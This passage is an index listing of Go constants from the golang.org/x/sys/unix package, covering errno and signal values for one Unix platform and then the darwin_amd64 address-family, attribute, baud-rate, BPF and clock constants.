| WPARSTART = 0x1 constant WPARSTOP (line 1030) | WPARSTOP = 0x2 constant WPARTTYNAME (line 1031) | WPARTTYNAME = "Global" constant XCASE (line 1032) | XCASE = 0x4 constant XTABS (line 1033) | XTABS = 0xc00 constant _FDATAFLUSH (line 1034) | _FDATAFLUSH = 0x2000000000 constant E2BIG (line 1039) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1040) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1041) | EADDRINUSE = syscall.Errno(0x43) constant EADDRNOTAVAIL (line 1042) | EADDRNOTAVAIL = syscall.Errno(0x44) constant EAFNOSUPPORT (line 1043) | EAFNOSUPPORT = syscall.Errno(0x42) constant EAGAIN (line 1044) | EAGAIN = syscall.Errno(0xb) constant EALREADY (line 1045) | EALREADY = syscall.Errno(0x38) constant EBADF (line 1046) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1047) | EBADMSG = syscall.Errno(0x78) constant EBUSY (line 1048) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1049) | ECANCELED = syscall.Errno(0x75) constant ECHILD (line 1050) | ECHILD = syscall.Errno(0xa) constant ECHRNG (line 1051) | ECHRNG = syscall.Errno(0x25) constant ECLONEME (line 1052) | ECLONEME = syscall.Errno(0x52) constant ECONNABORTED (line 1053) | ECONNABORTED = syscall.Errno(0x48) constant ECONNREFUSED (line 1054) | ECONNREFUSED = syscall.Errno(0x4f) constant ECONNRESET (line 1055) | ECONNRESET = syscall.Errno(0x49) constant ECORRUPT (line 1056) | ECORRUPT = syscall.Errno(0x59) constant EDEADLK (line 1057) | EDEADLK = syscall.Errno(0x2d) constant EDESTADDREQ (line 1058) | EDESTADDREQ = syscall.Errno(0x3a) constant EDESTADDRREQ (line 1059) | EDESTADDRREQ = syscall.Errno(0x3a) constant EDIST (line 1060) | EDIST = syscall.Errno(0x35) constant EDOM (line 1061) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1062) | EDQUOT = syscall.Errno(0x58) constant EEXIST (line 1063) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1064) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1065) | EFBIG = syscall.Errno(0x1b) constant EFORMAT (line 1066) | EFORMAT = syscall.Errno(0x30) constant EHOSTDOWN (line 1067) | EHOSTDOWN = syscall.Errno(0x50) constant EHOSTUNREACH (line 1068) | EHOSTUNREACH = syscall.Errno(0x51) constant EIDRM (line 1069) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 1070) | EILSEQ = syscall.Errno(0x74) constant EINPROGRESS (line 1071) | EINPROGRESS = syscall.Errno(0x37) constant EINTR (line 1072) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1073) | EINVAL = syscall.Errno(0x16) constant EIO (line 1074) | EIO = syscall.Errno(0x5) constant EISCONN (line 1075) | EISCONN = syscall.Errno(0x4b) constant EISDIR (line 1076) | EISDIR = syscall.Errno(0x15) constant EL2HLT (line 1077) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 1078) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 1079) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 1080) | EL3RST = syscall.Errno(0x28) constant ELNRNG (line 1081) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 1082) | ELOOP = syscall.Errno(0x55) constant EMEDIA (line 1083) | EMEDIA = syscall.Errno(0x6e) constant EMFILE (line 1084) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1085) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1086) | EMSGSIZE = syscall.Errno(0x3b) constant EMULTIHOP (line 1087) | EMULTIHOP = syscall.Errno(0x7d) constant ENAMETOOLONG (line 1088) | ENAMETOOLONG = syscall.Errno(0x56) constant ENETDOWN (line 1089) | ENETDOWN = syscall.Errno(0x45) constant ENETRESET (line 1090) | ENETRESET = syscall.Errno(0x47) constant ENETUNREACH (line 1091) | ENETUNREACH = syscall.Errno(0x46) constant ENFILE (line 1092) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1093) | ENOATTR = syscall.Errno(0x70) constant ENOBUFS (line 1094) | ENOBUFS = syscall.Errno(0x4a) constant ENOCONNECT (line 1095) | ENOCONNECT = syscall.Errno(0x32) constant ENOCSI (line 1096) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 1097) | ENODATA = syscall.Errno(0x7a) constant ENODEV (line 1098) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1099) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1100) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1101) | ENOLCK = syscall.Errno(0x31) constant ENOLINK (line 1102) | ENOLINK = syscall.Errno(0x7e) constant ENOMEM (line 1103) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1104) | ENOMSG = syscall.Errno(0x23) constant ENOPROTOOPT (line 1105) | ENOPROTOOPT = syscall.Errno(0x3d) constant ENOSPC (line 1106) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1107) | ENOSR = syscall.Errno(0x76) constant ENOSTR (line 1108) | ENOSTR = syscall.Errno(0x7b) constant ENOSYS (line 1109) | ENOSYS = syscall.Errno(0x6d) constant ENOTBLK (line 1110) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1111) | ENOTCONN = syscall.Errno(0x4c) constant ENOTDIR (line 1112) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1113) | ENOTEMPTY = syscall.Errno(0x11) constant ENOTREADY (line 1114) | ENOTREADY = syscall.Errno(0x2e) constant ENOTRECOVERABLE (line 1115) | ENOTRECOVERABLE = syscall.Errno(0x5e) constant ENOTRUST (line 1116) | ENOTRUST = syscall.Errno(0x72) constant ENOTSOCK (line 1117) | ENOTSOCK = syscall.Errno(0x39) constant ENOTSUP (line 1118) | ENOTSUP = syscall.Errno(0x7c) constant ENOTTY (line 1119) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1120) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1121) | EOPNOTSUPP = syscall.Errno(0x40) constant EOVERFLOW (line 1122) | EOVERFLOW = syscall.Errno(0x7f) constant EOWNERDEAD (line 1123) | EOWNERDEAD = syscall.Errno(0x5f) constant EPERM (line 1124) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1125) | EPFNOSUPPORT = syscall.Errno(0x41) constant EPIPE (line 1126) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1127) | EPROCLIM = syscall.Errno(0x53) constant EPROTO (line 1128) | EPROTO = syscall.Errno(0x79) constant EPROTONOSUPPORT (line 1129) | EPROTONOSUPPORT = syscall.Errno(0x3e) constant EPROTOTYPE (line 1130) | EPROTOTYPE = syscall.Errno(0x3c) constant ERANGE (line 1131) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1132) | EREMOTE = syscall.Errno(0x5d) constant ERESTART (line 1133) | ERESTART = syscall.Errno(0x52) constant EROFS (line 1134) | EROFS = syscall.Errno(0x1e) constant ESAD (line 1135) | ESAD = syscall.Errno(0x71) constant ESHUTDOWN (line 1136) | ESHUTDOWN = syscall.Errno(0x4d) constant ESOCKTNOSUPPORT (line 1137) | ESOCKTNOSUPPORT = syscall.Errno(0x3f) constant ESOFT (line 1138) | ESOFT = syscall.Errno(0x6f) constant ESPIPE (line 1139) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1140) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1141) | ESTALE = syscall.Errno(0x34) constant ESYSERROR (line 1142) | ESYSERROR = syscall.Errno(0x5a) constant ETIME (line 1143) | ETIME = syscall.Errno(0x77) constant ETIMEDOUT (line 1144) | ETIMEDOUT = syscall.Errno(0x4e) constant ETOOMANYREFS (line 1145) | ETOOMANYREFS = syscall.Errno(0x73) constant ETXTBSY (line 1146) | ETXTBSY = syscall.Errno(0x1a) constant EUNATCH (line 1147) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 1148) | EUSERS = syscall.Errno(0x54) constant EWOULDBLOCK (line 1149) | EWOULDBLOCK = syscall.Errno(0xb) constant EWRPROTECT (line 1150) | EWRPROTECT = syscall.Errno(0x2f) constant EXDEV (line 1151) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1156) | SIGABRT = syscall.Signal(0x6) constant SIGAIO (line 1157) | SIGAIO = syscall.Signal(0x17) constant SIGALRM (line 1158) | SIGALRM = syscall.Signal(0xe) constant SIGALRM1 (line 1159) | SIGALRM1 = syscall.Signal(0x26) constant SIGBUS (line 1160) | SIGBUS = syscall.Signal(0xa) constant SIGCAPI (line 1161) | SIGCAPI = syscall.Signal(0x31) constant SIGCHLD (line 1162) | SIGCHLD = syscall.Signal(0x14) constant SIGCLD (line 1163) | SIGCLD = syscall.Signal(0x14) constant SIGCONT (line 1164) | SIGCONT = syscall.Signal(0x13) constant SIGCPUFAIL (line 1165) | SIGCPUFAIL = syscall.Signal(0x3b) constant SIGDANGER (line 1166) | SIGDANGER = syscall.Signal(0x21) constant SIGEMT (line 1167) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1168) | SIGFPE = syscall.Signal(0x8) constant SIGGRANT (line 1169) | SIGGRANT = syscall.Signal(0x3c) constant SIGHUP (line 1170) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1171) | SIGILL = syscall.Signal(0x4) constant SIGINT (line 1172) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1173) | SIGIO = syscall.Signal(0x17) constant SIGIOINT (line 1174) | SIGIOINT = syscall.Signal(0x10) constant SIGIOT (line 1175) | SIGIOT = syscall.Signal(0x6) constant SIGKAP (line 1176) | SIGKAP = syscall.Signal(0x3c) constant SIGKILL (line 1177) | SIGKILL = syscall.Signal(0x9) constant SIGLOST (line 1178) | SIGLOST = syscall.Signal(0x6) constant SIGMAX (line 1179) | SIGMAX = syscall.Signal(0xff) constant SIGMAX32 (line 1180) | SIGMAX32 = syscall.Signal(0x3f) constant SIGMIGRATE (line 1181) | SIGMIGRATE = syscall.Signal(0x23) constant SIGMSG (line 1182) | SIGMSG = syscall.Signal(0x1b) constant SIGPIPE (line 1183) | SIGPIPE = syscall.Signal(0xd) constant SIGPOLL (line 1184) | SIGPOLL = syscall.Signal(0x17) constant SIGPRE (line 1185) | SIGPRE = syscall.Signal(0x24) constant SIGPROF (line 1186) | SIGPROF = syscall.Signal(0x20) constant SIGPTY (line 1187) | SIGPTY = syscall.Signal(0x17) constant SIGPWR (line 1188) | SIGPWR = syscall.Signal(0x1d) constant SIGQUIT (line 1189) | SIGQUIT = syscall.Signal(0x3) constant SIGRECONFIG (line 1190) | SIGRECONFIG = syscall.Signal(0x3a) constant SIGRETRACT (line 1191) | SIGRETRACT = syscall.Signal(0x3d) constant SIGSAK (line 1192) | SIGSAK = syscall.Signal(0x3f) constant SIGSEGV (line 1193) | SIGSEGV = syscall.Signal(0xb) constant SIGSOUND (line 1194) | SIGSOUND = syscall.Signal(0x3e) constant SIGSTOP (line 1195) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1196) | SIGSYS = syscall.Signal(0xc) constant SIGSYSERROR (line 1197) | SIGSYSERROR = syscall.Signal(0x30) constant SIGTALRM (line 1198) | SIGTALRM = syscall.Signal(0x26) constant SIGTERM (line 1199) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1200) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1201) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1202) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1203) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1204) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1205) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1206) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVIRT (line 1207) | SIGVIRT = syscall.Signal(0x25) constant SIGVTALRM (line 1208) | SIGVTALRM = syscall.Signal(0x22) constant SIGWAITING (line 1209) | SIGWAITING = syscall.Signal(0x27) constant SIGWINCH (line 1210) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1211) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1212) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_darwin_amd64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_CCITT (line 15) | AF_CCITT = 0xa constant AF_CHAOS (line 16) | AF_CHAOS = 0x5 constant AF_CNT (line 17) | AF_CNT = 0x15 constant AF_COIP (line 18) | AF_COIP = 0x14 constant AF_DATAKIT (line 19) | AF_DATAKIT = 0x9 constant AF_DECnet (line 20) | AF_DECnet = 0xc constant AF_DLI (line 21) | AF_DLI = 0xd constant AF_E164 (line 22) | AF_E164 = 0x1c constant AF_ECMA (line 23) | AF_ECMA = 0x8 constant AF_HYLINK (line 24) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 25) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 26) | AF_IMPLINK = 0x3 constant AF_INET (line 27) | AF_INET = 0x2 constant AF_INET6 (line 28) | AF_INET6 = 0x1e constant AF_IPX (line 29) | AF_IPX = 0x17 constant AF_ISDN (line 30) | AF_ISDN = 0x1c constant AF_ISO (line 31) | AF_ISO = 0x7 constant AF_LAT (line 32) | AF_LAT = 0xe constant AF_LINK (line 33) | AF_LINK = 0x12 constant AF_LOCAL (line 34) | AF_LOCAL = 0x1 constant AF_MAX (line 35) | AF_MAX = 0x29 constant AF_NATM (line 36) | AF_NATM = 0x1f constant AF_NDRV (line 37) | AF_NDRV = 0x1b constant AF_NETBIOS (line 38) | AF_NETBIOS = 0x21 constant AF_NS (line 39) | AF_NS = 0x6 constant AF_OSI (line 40) | AF_OSI = 0x7 constant AF_PPP (line 41) | AF_PPP = 0x22 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_RESERVED_36 (line 43) | AF_RESERVED_36 = 0x24 constant AF_ROUTE (line 44) | AF_ROUTE = 0x11 constant AF_SIP (line 45) | AF_SIP = 0x18 constant AF_SNA (line 46) | AF_SNA = 0xb constant AF_SYSTEM (line 47) | AF_SYSTEM = 0x20 constant AF_SYS_CONTROL (line 48) | AF_SYS_CONTROL = 0x2 constant AF_UNIX (line 49) | AF_UNIX = 0x1 constant AF_UNSPEC (line 50) | AF_UNSPEC = 0x0 constant AF_UTUN (line 51) | AF_UTUN = 0x26 constant AF_VSOCK (line 52) | AF_VSOCK = 0x28 constant ALTWERASE (line 53) | ALTWERASE = 0x200 constant ATTR_BIT_MAP_COUNT (line 54) | ATTR_BIT_MAP_COUNT = 0x5 constant ATTR_CMN_ACCESSMASK (line 55) | ATTR_CMN_ACCESSMASK = 0x20000 constant ATTR_CMN_ACCTIME (line 56) | ATTR_CMN_ACCTIME = 0x1000 constant ATTR_CMN_ADDEDTIME (line 57) | ATTR_CMN_ADDEDTIME = 0x10000000 constant ATTR_CMN_BKUPTIME (line 58) | ATTR_CMN_BKUPTIME = 0x2000 constant ATTR_CMN_CHGTIME (line 59) | ATTR_CMN_CHGTIME = 0x800 constant ATTR_CMN_CRTIME (line 60) | ATTR_CMN_CRTIME = 0x200 constant ATTR_CMN_DATA_PROTECT_FLAGS (line 61) | ATTR_CMN_DATA_PROTECT_FLAGS = 0x40000000 constant ATTR_CMN_DEVID (line 62) | ATTR_CMN_DEVID = 0x2 constant ATTR_CMN_DOCUMENT_ID (line 63) | ATTR_CMN_DOCUMENT_ID = 0x100000 constant ATTR_CMN_ERROR (line 64) | ATTR_CMN_ERROR = 0x20000000 constant ATTR_CMN_EXTENDED_SECURITY (line 65) | ATTR_CMN_EXTENDED_SECURITY = 0x400000 constant ATTR_CMN_FILEID (line 66) | ATTR_CMN_FILEID = 0x2000000 constant ATTR_CMN_FLAGS (line 67) | ATTR_CMN_FLAGS = 0x40000 constant ATTR_CMN_FNDRINFO (line 68) | ATTR_CMN_FNDRINFO = 0x4000 constant ATTR_CMN_FSID (line 69) | ATTR_CMN_FSID = 0x4 constant ATTR_CMN_FULLPATH (line 70) | ATTR_CMN_FULLPATH = 0x8000000 constant ATTR_CMN_GEN_COUNT (line 71) | ATTR_CMN_GEN_COUNT = 0x80000 constant ATTR_CMN_GRPID (line 72) | ATTR_CMN_GRPID = 0x10000 constant ATTR_CMN_GRPUUID (line 73) | ATTR_CMN_GRPUUID = 0x1000000 constant ATTR_CMN_MODTIME (line 74) | ATTR_CMN_MODTIME = 0x400 constant ATTR_CMN_NAME (line 75) | ATTR_CMN_NAME = 0x1 constant ATTR_CMN_NAMEDATTRCOUNT (line 76) | ATTR_CMN_NAMEDATTRCOUNT = 0x80000 constant ATTR_CMN_NAMEDATTRLIST (line 77) | ATTR_CMN_NAMEDATTRLIST = 0x100000 constant ATTR_CMN_OBJID (line 78) | ATTR_CMN_OBJID = 0x20 constant ATTR_CMN_OBJPERMANENTID (line 79) | ATTR_CMN_OBJPERMANENTID = 0x40 constant ATTR_CMN_OBJTAG (line 80) | ATTR_CMN_OBJTAG = 0x10 constant ATTR_CMN_OBJTYPE (line 81) | ATTR_CMN_OBJTYPE = 0x8 constant ATTR_CMN_OWNERID (line 82) | ATTR_CMN_OWNERID = 0x8000 constant ATTR_CMN_PARENTID (line 83) | ATTR_CMN_PARENTID = 0x4000000 constant ATTR_CMN_PAROBJID (line 84) | ATTR_CMN_PAROBJID = 0x80 constant ATTR_CMN_RETURNED_ATTRS (line 85) | ATTR_CMN_RETURNED_ATTRS = 0x80000000 constant ATTR_CMN_SCRIPT (line 86) | ATTR_CMN_SCRIPT = 0x100 constant ATTR_CMN_SETMASK (line 87) | ATTR_CMN_SETMASK = 0x51c7ff00 constant ATTR_CMN_USERACCESS (line 88) | ATTR_CMN_USERACCESS = 0x200000 constant ATTR_CMN_UUID (line 89) | ATTR_CMN_UUID = 0x800000 constant ATTR_CMN_VALIDMASK (line 90) | ATTR_CMN_VALIDMASK = 0xffffffff constant ATTR_CMN_VOLSETMASK (line 91) | ATTR_CMN_VOLSETMASK = 0x6700 constant ATTR_FILE_ALLOCSIZE (line 92) | ATTR_FILE_ALLOCSIZE = 0x4 constant ATTR_FILE_CLUMPSIZE (line 93) | ATTR_FILE_CLUMPSIZE = 0x10 constant ATTR_FILE_DATAALLOCSIZE (line 94) | ATTR_FILE_DATAALLOCSIZE = 0x400 constant ATTR_FILE_DATAEXTENTS (line 95) | ATTR_FILE_DATAEXTENTS = 0x800 constant ATTR_FILE_DATALENGTH (line 96) | ATTR_FILE_DATALENGTH = 0x200 constant ATTR_FILE_DEVTYPE (line 97) | ATTR_FILE_DEVTYPE = 0x20 constant ATTR_FILE_FILETYPE (line 98) | ATTR_FILE_FILETYPE = 0x40 constant ATTR_FILE_FORKCOUNT (line 99) | ATTR_FILE_FORKCOUNT = 0x80 constant ATTR_FILE_FORKLIST (line 100) | ATTR_FILE_FORKLIST = 0x100 constant ATTR_FILE_IOBLOCKSIZE (line 101) | ATTR_FILE_IOBLOCKSIZE = 0x8 constant ATTR_FILE_LINKCOUNT (line 102) | ATTR_FILE_LINKCOUNT = 0x1 constant ATTR_FILE_RSRCALLOCSIZE (line 103) | ATTR_FILE_RSRCALLOCSIZE = 0x2000 constant ATTR_FILE_RSRCEXTENTS (line 104) | ATTR_FILE_RSRCEXTENTS = 0x4000 constant ATTR_FILE_RSRCLENGTH (line 105) | ATTR_FILE_RSRCLENGTH = 0x1000 constant ATTR_FILE_SETMASK (line 106) | ATTR_FILE_SETMASK = 0x20 constant ATTR_FILE_TOTALSIZE (line 107) | ATTR_FILE_TOTALSIZE = 0x2 constant ATTR_FILE_VALIDMASK (line 108) | ATTR_FILE_VALIDMASK = 0x37ff constant ATTR_VOL_ALLOCATIONCLUMP (line 109) | ATTR_VOL_ALLOCATIONCLUMP = 0x40 constant ATTR_VOL_ATTRIBUTES (line 110) | ATTR_VOL_ATTRIBUTES = 0x40000000 constant ATTR_VOL_CAPABILITIES (line 111) | ATTR_VOL_CAPABILITIES = 0x20000 constant ATTR_VOL_DIRCOUNT (line 112) | ATTR_VOL_DIRCOUNT = 0x400 constant ATTR_VOL_ENCODINGSUSED (line 113) | ATTR_VOL_ENCODINGSUSED = 0x10000 constant ATTR_VOL_FILECOUNT (line 114) | ATTR_VOL_FILECOUNT = 0x200 constant ATTR_VOL_FSTYPE (line 115) | ATTR_VOL_FSTYPE = 0x1 constant ATTR_VOL_INFO (line 116) | ATTR_VOL_INFO = 0x80000000 constant ATTR_VOL_IOBLOCKSIZE (line 117) | ATTR_VOL_IOBLOCKSIZE = 0x80 constant ATTR_VOL_MAXOBJCOUNT (line 118) | ATTR_VOL_MAXOBJCOUNT = 0x800 constant ATTR_VOL_MINALLOCATION (line 119) | ATTR_VOL_MINALLOCATION = 0x20 constant ATTR_VOL_MOUNTEDDEVICE (line 120) | ATTR_VOL_MOUNTEDDEVICE = 0x8000 constant ATTR_VOL_MOUNTFLAGS (line 121) | ATTR_VOL_MOUNTFLAGS = 0x4000 constant ATTR_VOL_MOUNTPOINT (line 122) | ATTR_VOL_MOUNTPOINT = 0x1000 constant ATTR_VOL_NAME (line 123) | ATTR_VOL_NAME = 0x2000 constant ATTR_VOL_OBJCOUNT (line 124) | ATTR_VOL_OBJCOUNT = 0x100 constant ATTR_VOL_QUOTA_SIZE (line 125) | ATTR_VOL_QUOTA_SIZE = 0x10000000 constant ATTR_VOL_RESERVED_SIZE (line 126) | ATTR_VOL_RESERVED_SIZE = 0x20000000 constant ATTR_VOL_SETMASK (line 127) | ATTR_VOL_SETMASK = 0x80002000 constant ATTR_VOL_SIGNATURE (line 128) | ATTR_VOL_SIGNATURE = 0x2 constant ATTR_VOL_SIZE (line 129) | ATTR_VOL_SIZE = 0x4 constant ATTR_VOL_SPACEAVAIL (line 130) | ATTR_VOL_SPACEAVAIL = 0x10 constant ATTR_VOL_SPACEFREE (line 131) | ATTR_VOL_SPACEFREE = 0x8 constant ATTR_VOL_SPACEUSED (line 132) | ATTR_VOL_SPACEUSED = 0x800000 constant ATTR_VOL_UUID (line 133) | ATTR_VOL_UUID = 0x40000 constant ATTR_VOL_VALIDMASK (line 134) | ATTR_VOL_VALIDMASK = 0xf087ffff constant B0 (line 135) | B0 = 0x0 constant B110 (line 136) | B110 = 0x6e constant B115200 (line 137) | B115200 = 0x1c200 constant B1200 (line 138) | B1200 = 0x4b0 constant B134 (line 139) | B134 = 0x86 constant B14400 (line 140) | B14400 = 0x3840 constant B150 (line 141) | B150 = 0x96 constant B1800 (line 142) | B1800 = 0x708 constant B19200 (line 143) | B19200 = 0x4b00 constant B200 (line 144) | B200 = 0xc8 constant B230400 (line 145) | B230400 = 0x38400 constant B2400 (line 146) | B2400 = 0x960 constant B28800 (line 147) | B28800 = 0x7080 constant B300 (line 148) | B300 = 0x12c constant B38400 (line 149) | B38400 = 0x9600 constant B4800 (line 150) | B4800 = 0x12c0 constant B50 (line 151) | B50 = 0x32 constant B57600 (line 152) | B57600 = 0xe100 constant B600 (line 153) | B600 = 0x258 constant B7200 (line 154) | B7200 = 0x1c20 constant B75 (line 155) | B75 = 0x4b constant B76800 (line 156) | B76800 = 0x12c00 constant B9600 (line 157) | B9600 = 0x2580 constant BIOCFLUSH (line 158) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 159) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 160) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 161) | BIOCGDLTLIST = 0xc00c4279 constant BIOCGETIF (line 162) | BIOCGETIF = 0x4020426b constant BIOCGHDRCMPLT (line 163) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 164) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 165) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 166) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 167) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 168) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 169) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 170) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 171) | BIOCSDLT = 0x80044278 constant BIOCSETF (line 172) | BIOCSETF = 0x80104267 constant BIOCSETFNR (line 173) | BIOCSETFNR = 0x8010427e constant BIOCSETIF (line 174) | BIOCSETIF = 0x8020426c constant BIOCSHDRCMPLT (line 175) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 176) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 177) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 178) | BIOCSSEESENT = 0x80044277 constant BIOCVERSION (line 179) | BIOCVERSION = 0x40044271 constant BPF_A (line 180) | BPF_A = 0x10 constant BPF_ABS (line 181) | BPF_ABS = 0x20 constant BPF_ADD (line 182) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 183) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 184) | BPF_ALU = 0x4 constant BPF_AND (line 185) | BPF_AND = 0x50 constant BPF_B (line 186) | BPF_B = 0x10 constant BPF_DIV (line 187) | BPF_DIV = 0x30 constant BPF_H (line 188) | BPF_H = 0x8 constant BPF_IMM (line 189) | BPF_IMM = 0x0 constant BPF_IND (line 190) | BPF_IND = 0x40 constant BPF_JA (line 191) | BPF_JA = 0x0 constant BPF_JEQ (line 192) | BPF_JEQ = 0x10 constant BPF_JGE (line 193) | BPF_JGE = 0x30 constant BPF_JGT (line 194) | BPF_JGT = 0x20 constant BPF_JMP (line 195) | BPF_JMP = 0x5 constant BPF_JSET (line 196) | BPF_JSET = 0x40 constant BPF_K (line 197) | BPF_K = 0x0 constant BPF_LD (line 198) | BPF_LD = 0x0 constant BPF_LDX (line 199) | BPF_LDX = 0x1 constant BPF_LEN (line 200) | BPF_LEN = 0x80 constant BPF_LSH (line 201) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 202) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 203) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 204) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 205) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 206) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 207) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 208) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 209) | BPF_MISC = 0x7 constant BPF_MSH (line 210) | BPF_MSH = 0xa0 constant BPF_MUL (line 211) | BPF_MUL = 0x20 constant BPF_NEG (line 212) | BPF_NEG = 0x80 constant BPF_OR (line 213) | BPF_OR = 0x40 constant BPF_RELEASE (line 214) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 215) | BPF_RET = 0x6 constant BPF_RSH (line 216) | BPF_RSH = 0x70 constant BPF_ST (line 217) | BPF_ST = 0x2 constant BPF_STX (line 218) | BPF_STX = 0x3 constant BPF_SUB (line 219) | BPF_SUB = 0x10 constant BPF_TAX (line 220) | BPF_TAX = 0x0 constant BPF_TXA (line 221) | BPF_TXA = 0x80 constant BPF_W (line 222) | BPF_W = 0x0 constant BPF_X (line 223) | BPF_X = 0x8 constant BRKINT (line 224) | BRKINT = 0x2 constant BS0 (line 225) | BS0 = 0x0 constant BS1 (line 226) | BS1 = 0x8000 constant BSDLY (line 227) | BSDLY = 0x8000 constant CFLUSH (line 228) | CFLUSH = 0xf constant CLOCAL (line 229) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 230) | CLOCK_MONOTONIC = 0x6 constant CLOCK_MONOTONIC_RAW (line 231) | CLOCK_MONOTONIC_RAW = 0x4 constant CLOCK_MONOTONIC_RAW_APPROX (line 232) | CLOCK_MONOTONIC_RAW_APPROX = 0x5 constant CLOCK_PROCESS_CPUTIME_ID (line 233) | CLOCK_PROCESS_CPUTIME_ID = 0xc constant CLOCK_REALTIME (line 234) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 235) | CLOCK_THREAD_CPUTIME_ID = 0x10 constant CLOCK_UPTIME_RAW (line 236) | CLOCK_UPTIME_RAW = 0x8 constant CLOCK_UPTIME_RAW_APPROX (line 237) | CLOCK_UPTIME_RAW_APPROX = 0x9 constant CLONE_NOFOLLOW (line 238) | CLONE_NOFOLLOW = 0x1 constant CLONE_NOOWNERCOPY (line 239) | CLONE_NOOWNERCOPY = 0x2 constant CR0 (line 240) | CR0 = 0x0 constant CR1 (line 241) | CR1 = 0x1000 constant CR2 (line 242) | CR2 = 0x2000 constant CR3 (line 243) | CR3 = 0x3000 constant CRDLY (line 244) | CRDLY = 0x3000 constant CREAD (line 245) | CREAD = 0x800 constant CRTSCTS (line 246) | CRTSCTS = 0x30000 constant CS5 (line 247) | CS5 = 0x0 constant CS6 (line 248) | CS6 = 0x100 constant CS7 (line 249) | CS7 = 0x200 constant CS8 (line 250) | CS8 = 0x300 constant CSIZE (line 251) | CSIZE = 0x300 constant CSTART (line 252) | CSTART = 0x11 constant CSTATUS (line 253) | CSTATUS = 0x14 constant CSTOP (line 254) | CSTOP = 0x13 constant CSTOPB (line 255) | CSTOPB = 0x400 constant CSUSP (line 256) | CSUSP = 0x1a constant CTLIOCGINFO (line 257) | CTLIOCGINFO = 0xc0644e03 constant CTL_HW (line 258) | CTL_HW = 0x6 constant CTL_KERN (line 259) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 260) | CTL_MAXNAME = 0xc constant CTL_NET (line 261) | CTL_NET = 0x4 constant 